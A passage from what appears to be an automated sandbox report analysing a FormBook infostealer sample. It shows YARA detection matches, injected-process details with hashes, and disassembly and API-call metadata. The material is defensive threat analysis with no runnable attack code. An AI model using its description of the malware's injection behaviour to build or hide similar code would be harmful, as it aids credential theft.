                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  Reputation:low

                                                  General

                                                  Target ID:3
                                                  Start time:11:35:43
                                                  Start date:25/05/2023
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff618f60000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:4
                                                  Start time:11:35:50
                                                  Start date:25/05/2023
                                                  Path:C:\Windows\SysWOW64\WWAHost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                  Imagebase:0xd90000
                                                  File size:829856 bytes
                                                  MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  Reputation:moderate

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:13.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:143
                                                    Total number of Limit Nodes:10
                                                    execution_graph 17096 2a0b930 17097 2a0b996 17096->17097 17098 2a0ba45 17097->17098 17101 2a0bae0 17097->17101 17106 2a0baf0 17097->17106 17102 2a0baea 17101->17102 17105 2a0ba8b 17101->17105 17109 2a0b48c 17102->17109 17105->17098 17107 2a0bb1e 17106->17107 17108 2a0b48c DuplicateHandle 17106->17108 17107->17098 17108->17107 17110 2a0bb58 DuplicateHandle 17109->17110 17111 2a0bb1e 17110->17111 17111->17098 17112 8389fc8 17113 8389fe6 17112->17113 17114 8389ff0 17112->17114 17116 838a030 17113->17116 17117 838a03e 17116->17117 17120 838a05d 17116->17120 17121 838905c 17117->17121 17120->17114 17122 838a5b0 FindCloseChangeNotification 17121->17122 17123 838a059 17122->17123 17123->17114 17124 2a09150 17125 2a0915f 17124->17125 17128 2a09237 17124->17128 17136 2a09248 17124->17136 17129 2a0925b 17128->17129 17131 2a09273 17129->17131 17144 2a098c0 17129->17144 17148 2a098d0 17129->17148 17130 2a0926b 17130->17131 17132 2a09470 GetModuleHandleW 17130->17132 17131->17125 17133 2a0949d 17132->17133 17133->17125 17137 2a0925b 17136->17137 17138 2a09273 17137->17138 17142 2a098c0 LoadLibraryExW 17137->17142 17143 2a098d0 LoadLibraryExW 17137->17143 17138->17125 17139 2a0926b 17139->17138 17140 2a09470 GetModuleHandleW 17139->17140 17141 2a0949d 17140->17141 17141->17125 17142->17139 17143->17139 17145 2a098e4 17144->17145 17147 2a09909 17145->17147 17152 2a08638 17145->17152 17147->17130 17149 2a098e4 17148->17149 17150 2a08638 LoadLibraryExW 17149->17150 17151 2a09909 17149->17151 17150->17151 17151->17130 17153 2a09ab0 LoadLibraryExW 17152->17153 17155 2a09b29 17153->17155 17155->17147 16975 8387e30 16976 8387fbb 16975->16976 16977 8387e56 16975->16977 16977->16976 16982 2a0d744 16977->16982 16985 2a0fdd8 SetWindowLongW 16977->16985 16987 83880a8 16977->16987 16990 83880b0 PostMessageW 16977->16990 16983 2a0fde0 SetWindowLongW 16982->16983 16984 2a0fe4c 16983->16984 16984->16977 16986 2a0fe4c 16985->16986 16986->16977 16988 83880b0 PostMessageW 16987->16988 16989 838811c 16988->16989 16989->16977 16991 838811c 16990->16991 16991->16977 16992 2a03cc8 16993 2a03cd2 16992->16993 16997 2a041c1 16992->16997 17003 2a03c6c 16993->17003 16995 2a03ced 16998 2a041ca 16997->16998 17000 2a0421e 16997->17000 17007 2a042c0 16998->17007 17011 2a042b1 16998->17011 17000->16993 17004 2a03c77 17003->17004 17005 2a069dd 17004->17005 17019 2a0516c 17004->17019 17005->16995 17009 2a042e7 17007->17009 17008 2a043c4 17008->17008 17009->17008 17015 2a03cac 17009->17015 17013 2a042e7 17011->17013 17012 2a043c4 17013->17012 17014 2a03cac CreateActCtxA 17013->17014 17014->17012 17016 2a05350 CreateActCtxA 17015->17016 17018 2a05413 17016->17018 17020 2a05177 17019->17020 17023 2a0518c 17020->17023 17022 2a06a7d 17022->17005 17024 2a05192 17023->17024 17027 2a057e8 17024->17027 17026 2a06b5a 17026->17022 17028 2a057f3 17027->17028 17031 2a05818 17028->17031 17030 2a06c4a 17030->17026 17032 2a05823 17031->17032 17034 2a07109 17032->17034 17038 2a073aa 17032->17038 17033 2a0739c 17033->17030 17034->17033 17043 2a0b251 17034->17043 17049 2a0b260 17034->17049 17039 2a07357 17038->17039 17040 2a0739c 17039->17040 17041 2a0b260 3 API calls 17039->17041 17042 2a0b251 3 API calls 17039->17042 17040->17034 17041->17040 17042->17040 17045 2a0b256 17043->17045 17046 2a0b1f2 17043->17046 17044 2a0b2a5 17044->17033 17045->17044 17054 2a0b808 17045->17054 17058 2a0b818 17045->17058 17046->17033 17050 2a0b281 17049->17050 17051 2a0b2a5 17050->17051 17052 2a0b808 3 API calls 17050->17052 17053 2a0b818 3 API calls 17050->17053 17051->17033 17052->17051 17053->17051 17055 2a0b825 17054->17055 17057 2a0b85f 17055->17057 17062 2a0b404 17055->17062 17057->17044 17060 2a0b825 17058->17060 17059 2a0b85f 17059->17044 17060->17059 17061 2a0b404 3 API calls 17060->17061 17061->17059 17063 2a0b409 17062->17063 17065 2a0c150 17063->17065 17066 2a0b4ec 17063->17066 17067 2a0b4f7 17066->17067 17068 2a05818 3 API calls 17067->17068 17069 2a0c1bf 17067->17069 17068->17069 17074 2a0e002 17069->17074 17079 2a0df50 17069->17079 17088 2a0df38 17069->17088 17070 2a0c1f8 17070->17065 17075 2a0dfd8 17074->17075 17075->17074 17077 2a0ed88 CreateWindowExW 17075->17077 17078 2a0ed98 CreateWindowExW 17075->17078 17076 2a0e072 17076->17070 17077->17076 17078->17076 17081 2a0df81 17079->17081 17082 2a0e072 17079->17082 17080 2a0df8d 17080->17070 17081->17080 17086 2a0e3d0 LoadLibraryExW GetModuleHandleW 17081->17086 17087 2a0e3bf LoadLibraryExW GetModuleHandleW 17081->17087 17082->17070 17083 2a0dfcd 17084 2a0ed88 CreateWindowExW 17083->17084 17085 2a0ed98 CreateWindowExW 17083->17085 17084->17082 17085->17082 17086->17083 17087->17083 17089 2a0df4a 17088->17089 17090 2a0df8d 17089->17090 17094 2a0e3d0 LoadLibraryExW GetModuleHandleW 17089->17094 17095 2a0e3bf LoadLibraryExW GetModuleHandleW 17089->17095 17090->17070 17091 2a0dfcd 17092 2a0ed88 CreateWindowExW 17091->17092 17093 2a0ed98 CreateWindowExW 17091->17093 17092->17090 17093->17090 17094->17091 17095->17091

                                                    Executed Functions

                                                    Function 08386EC8 Relevance: 1.9, Strings: 1, Instructions: 662COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 8386ec8-8386ef9 1 8386efb 0->1 2 8386f00-8386fa3 0->2 1->2 3 8387a9b-8387ab2 2->3 4 8386fa8-83870d3 3->4 5 8387ab8-8387abf 3->5 13 83870fb-8387191 4->13 14 83870d5-83870f0 4->14 22 8387198-83871da 13->22 23 8387193 13->23 14->13 26 83871dc-83871f2 22->26 27 8387243-838727e 22->27 23->22 29 83871f7-8387217 26->29 32 8387280-838729b 27->32 33 83872a6 27->33 30 8387219-8387234 29->30 31 838723f-8387241 29->31 30->31 34 83872a7-83872b1 31->34 32->33 33->34 36 83872b8-8387308 34->36 37 83872b3 34->37 42 838730a-8387325 36->42 43 8387330-8387349 36->43 37->36 42->43 44 838734b-838737f 43->44 45 83873a7-838745c 43->45 44->45 49 8387381-838739c 44->49 57 838745e-8387479 45->57 58 8387484-83874c5 45->58 49->45 57->58 61 83874ed-8387538 58->61 62 83874c7-83874e2 58->62 68 83876d7-83876f3 61->68 62->61 69 83876f9-8387778 68->69 70 838753d-8387603 68->70 77 838777a-8387795 69->77 78 83877a0-83877e9 69->78 88 8387609-838767e 70->88 89 83876cc-83876d1 70->89 77->78 86 83877eb-83877ee 78->86 87 83877f1-8387804 78->87 86->87 90 838780b-838784c 87->90 91 8387806 87->91 98 8387683-83876a3 88->98 89->68 96 838784e-8387864 90->96 97 83878b5-83878f0 90->97 91->90 99 8387869-8387889 96->99 105 8387918 97->105 106 83878f2-838790d 97->106 100 83876cb 98->100 101 83876a5-83876c0 98->101 103 838788b-83878a6 99->103 104 83878b1-83878b3 99->104 100->89 101->100 103->104 107 8387919-8387928 104->107 105->107 106->105 111 838792d-838794d 107->111 114 838794f-838796a 111->114 115 8387975-838798f 111->115 114->115 117 8387991-83879e2 115->117 118 83879e3-8387a96 115->118 117->118 118->3 118->5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (
                                                    • API String ID: 0-3887548279
                                                    • Opcode ID: 6db98ef565a09578251cb21cf3e18342a287697fee23843eb76a427dc9e6a331
                                                    • Instruction ID: 86c939a27605871a3ba764cbb7304c88d9ad4466c744c4d6f22349c2de46362a
                                                    • Opcode Fuzzy Hash: 6db98ef565a09578251cb21cf3e18342a287697fee23843eb76a427dc9e6a331
                                                    • Instruction Fuzzy Hash: 6462D375A00228CFDB64DFA9C884BDDBBB2EF89305F1480EAD409A7295DB355E85CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 08389080 Relevance: .3, Instructions: 335COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ce67cc41cd9e3c0ad54560bcd21bd50095577a7541943657e9fcaffde92cefc
                                                    • Instruction ID: 62498cd35bb869045f5605872f5d470b257bce41c71109218c937940331a6157
                                                    • Opcode Fuzzy Hash: 2ce67cc41cd9e3c0ad54560bcd21bd50095577a7541943657e9fcaffde92cefc
                                                    • Instruction Fuzzy Hash: 8EC18531B01704CFDB29EB75C5A0BAABBE6AFC8701F14446ED5469B690CF38E906CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 08380040 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46018e096e800d6ec96b8816425e4cf37cf85b1b981ae7f1116a06df293899d2
                                                    • Instruction ID: 91e3a9f1c3d94f94bd08114370c5726854779c188abbaade487cd50f69e74712
                                                    • Opcode Fuzzy Hash: 46018e096e800d6ec96b8816425e4cf37cf85b1b981ae7f1116a06df293899d2
                                                    • Instruction Fuzzy Hash: F3412E71D05A18CBEB58DF6BDD4469AFAF7AFC8301F14C1BAD80DA6255EB3009868F10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A09248 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 125 2a09248-2a09250 126 2a0925b-2a0925d 125->126 127 2a09256 call 2a085d4 125->127 128 2a09273-2a09277 126->128 129 2a0925f 126->129 127->126 130 2a09279-2a09283 128->130 131 2a0928b-2a092cc 128->131 180 2a09265 call 2a098c0 129->180 181 2a09265 call 2a098d0 129->181 130->131 136 2a092d9-2a092e7 131->136 137 2a092ce-2a092d6 131->137 132 2a0926b-2a0926d 132->128 133 2a093a8-2a09468 132->133 173 2a09470-2a0949b GetModuleHandleW 133->173 174 2a0946a-2a0946d 133->174 138 2a092e9-2a092ee 136->138 139 2a0930b-2a0930d 136->139 137->136 141 2a092f0-2a092f7 call 2a085e0 138->141 142 2a092f9 138->142 143 2a09310-2a09317 139->143 146 2a092fb-2a09309 141->146 142->146 147 2a09324-2a0932b 143->147 148 2a09319-2a09321 143->148 146->143 150 2a09338-2a09341 call 2a085f0 147->150 151 2a0932d-2a09335 147->151 148->147 156 2a09343-2a0934b 150->156 157 2a0934e-2a09353 150->157 151->150 156->157 158 2a09371-2a09375 157->158 159 2a09355-2a0935c 157->159 178 2a09378 call 2a09ba0 158->178 179 2a09378 call 2a09bc8 158->179 159->158 160 2a0935e-2a0936e call 2a08600 call 2a08610 159->160 160->158 163 2a0937b-2a0937e 166 2a09380-2a0939e 163->166 167 2a093a1-2a093a7 163->167 166->167 175 2a094a4-2a094b8 173->175 176 2a0949d-2a094a3 173->176 174->173 176->175 178->163 179->163 180->132 181->132
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02A0948E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 76e1053b62524e039b125a9a3689908b78bb5adac26bc295d426a1ecbd006444
                                                    • Instruction ID: cf4b9d867cd95e3cc6dedaf0954c7aeabdb0d67a20768ec4530e6a714d9aafbb
                                                    • Opcode Fuzzy Hash: 76e1053b62524e039b125a9a3689908b78bb5adac26bc295d426a1ecbd006444
                                                    • Instruction Fuzzy Hash: 54711270A00B068FDB64CF6AD19075BBBF1BF88704F00892DE44AD7A91DB75A8458F91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0D6F0 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 182 2a0d6f0-2a0fbfe 186 2a0fc00-2a0fc06 182->186 187 2a0fc09-2a0fc10 182->187 186->187 188 2a0fc12-2a0fc18 187->188 189 2a0fc1b-2a0fc53 187->189 188->189 190 2a0fc5b-2a0fcba CreateWindowExW 189->190 191 2a0fcc3-2a0fcfb 190->191 192 2a0fcbc-2a0fcc2 190->192 196 2a0fd08 191->196 197 2a0fcfd-2a0fd00 191->197 192->191 198 2a0fd09 196->198 197->196 198->198
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A0FCAA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: a92ef0e10eda6332aa24e1e835fe4afe738adb486c4d51c6a465246bd2f7c577
                                                    • Instruction ID: bace03b4da398e87323956616572db7ebee876a0fd17a32eb1be48e85ef11635
                                                    • Opcode Fuzzy Hash: a92ef0e10eda6332aa24e1e835fe4afe738adb486c4d51c6a465246bd2f7c577
                                                    • Instruction Fuzzy Hash: 7351FFB1D003489FDF14CFA9D894ADEBFB5BF58314F24812AE819AB250DB749885CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0D70C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 199 2a0d70c-2a0fbfe 201 2a0fc00-2a0fc06 199->201 202 2a0fc09-2a0fc10 199->202 201->202 203 2a0fc12-2a0fc18 202->203 204 2a0fc1b-2a0fcba CreateWindowExW 202->204 203->204 206 2a0fcc3-2a0fcfb 204->206 207 2a0fcbc-2a0fcc2 204->207 211 2a0fd08 206->211 212 2a0fcfd-2a0fd00 206->212 207->206 213 2a0fd09 211->213 212->211 213->213
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A0FCAA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: f91d541be8b15e6272ef6c0dbdb96be46bea99542077d7e4679029bd113f028c
                                                    • Instruction ID: 77ea67688c952fa82aef440668084dd7d8101c7521af7e6ede2ea354e2f3d2ff
                                                    • Opcode Fuzzy Hash: f91d541be8b15e6272ef6c0dbdb96be46bea99542077d7e4679029bd113f028c
                                                    • Instruction Fuzzy Hash: 6C51C2B1D003499FDF14CF9AD884ADEBBB5BF48314F24812AE819BB250DB759985CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0FB8C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 214 2a0fb8c-2a0fbfe 215 2a0fc00-2a0fc06 214->215 216 2a0fc09-2a0fc10 214->216 215->216 217 2a0fc12-2a0fc18 216->217 218 2a0fc1b-2a0fc53 216->218 217->218 219 2a0fc5b-2a0fcba CreateWindowExW 218->219 220 2a0fcc3-2a0fcfb 219->220 221 2a0fcbc-2a0fcc2 219->221 225 2a0fd08 220->225 226 2a0fcfd-2a0fd00 220->226 221->220 227 2a0fd09 225->227 226->225 227->227
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A0FCAA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 0c53f59dcebf8221d9bc3a0f5319ee1ba6aef2ab86a3c0db4d50a742e7c379f2
                                                    • Instruction ID: e3ad570856076bc388dbab1d0882f102143f33a31bc39c5cbe18d0b11fea04aa
                                                    • Opcode Fuzzy Hash: 0c53f59dcebf8221d9bc3a0f5319ee1ba6aef2ab86a3c0db4d50a742e7c379f2
                                                    • Instruction Fuzzy Hash: B251D0B1D003499FDF14CFA9D984ADEBBB5BF48314F24812AE819BB250DB749885CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A05345 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 228 2a05345-2a05411 CreateActCtxA 230 2a05413-2a05419 228->230 231 2a0541a-2a05474 228->231 230->231 238 2a05483-2a05487 231->238 239 2a05476-2a05479 231->239 240 2a05498 238->240 241 2a05489-2a05495 238->241 239->238 243 2a05499 240->243 241->240 243->243
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02A05401
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: f8ddd987e8e08c91a7869025ff6e6d8d7f280773fe3d7d54cdccfdb38217d2be
                                                    • Instruction ID: 1963eafe71adcd9995940ef47ca3382350a2fea2354ba8de47508f6c63470b56
                                                    • Opcode Fuzzy Hash: f8ddd987e8e08c91a7869025ff6e6d8d7f280773fe3d7d54cdccfdb38217d2be
                                                    • Instruction Fuzzy Hash: 8F41F4B1C00619CFDB24CFA9C884BDEBBB6BF54308F648169D408BB251DB756946CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A03CAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 244 2a03cac-2a05411 CreateActCtxA 247 2a05413-2a05419 244->247 248 2a0541a-2a05474 244->248 247->248 255 2a05483-2a05487 248->255 256 2a05476-2a05479 248->256 257 2a05498 255->257 258 2a05489-2a05495 255->258 256->255 260 2a05499 257->260 258->257 260->260
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02A05401
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 648c75cedcd483498c6ce8f7c172e2a736b55fdaf326d3fc8fe0e7725a2c4879
                                                    • Instruction ID: 87c2186add8fb205316de4a7064979ebc7267206551cf39bcda0d9d36e8e11a3
                                                    • Opcode Fuzzy Hash: 648c75cedcd483498c6ce8f7c172e2a736b55fdaf326d3fc8fe0e7725a2c4879
                                                    • Instruction Fuzzy Hash: AF41E371C00618CBDB24CFAAC884BDDBBB6BF58305F648159D408BB251DBB56945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0B48C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 261 2a0b48c-2a0bbec DuplicateHandle 263 2a0bbf5-2a0bc12 261->263 264 2a0bbee-2a0bbf4 261->264 264->263
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A0BB1E,?,?,?,?,?), ref: 02A0BBDF
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: a48387b4b47b27ef96ace78b853a7ce94db3bb55ce776aa085d8406d6798d58e
                                                    • Instruction ID: 3f93dd6f370aa452b3e5c002698d3f36b52d3d26ddb6ea0606bbcf82f20c95c3
                                                    • Opcode Fuzzy Hash: a48387b4b47b27ef96ace78b853a7ce94db3bb55ce776aa085d8406d6798d58e
                                                    • Instruction Fuzzy Hash: 6B2114B5D002489FDB10CF9AD984AEEBBF8EB58324F14845AE954B3350D778A944CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0BB52 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 267 2a0bb52-2a0bbec DuplicateHandle 268 2a0bbf5-2a0bc12 267->268 269 2a0bbee-2a0bbf4 267->269 269->268
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A0BB1E,?,?,?,?,?), ref: 02A0BBDF
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: ddd77e4601d225c3434347dcfb3b70f36c95c9d0e735874821ad113e67c26d7c
                                                    • Instruction ID: 1bbe7bd7ec5a5365be2ef70efc9de83bb3f0ab676bf692facded5f6737256c33
                                                    • Opcode Fuzzy Hash: ddd77e4601d225c3434347dcfb3b70f36c95c9d0e735874821ad113e67c26d7c
                                                    • Instruction Fuzzy Hash: C62114B59002499FDB10CF9AD584ADEBFF8EB58324F14841AE954B3310D378A944CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A09AA8 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 272 2a09aa8-2a09aad 273 2a09a9d-2a09aa7 272->273 274 2a09aaf-2a09af0 272->274 273->272 275 2a09af2-2a09af5 274->275 276 2a09af8-2a09b27 LoadLibraryExW 274->276 275->276 277 2a09b30-2a09b4d 276->277 278 2a09b29-2a09b2f 276->278 278->277
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A09909,00000800,00000000,00000000), ref: 02A09B1A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 47940124e5736b4def38b6f874b7a97281407a73bb1e1de60783482ef66fe77a
                                                    • Instruction ID: d09eba70e8a7e39f7849b1a9af08cf2a47973efbef25ada4298ed02f642ddb21
                                                    • Opcode Fuzzy Hash: 47940124e5736b4def38b6f874b7a97281407a73bb1e1de60783482ef66fe77a
                                                    • Instruction Fuzzy Hash: 842144B29003499FCB10CF9AD484ADEFBF4EB59720F14845AE469A7640D778A546CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A08638 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
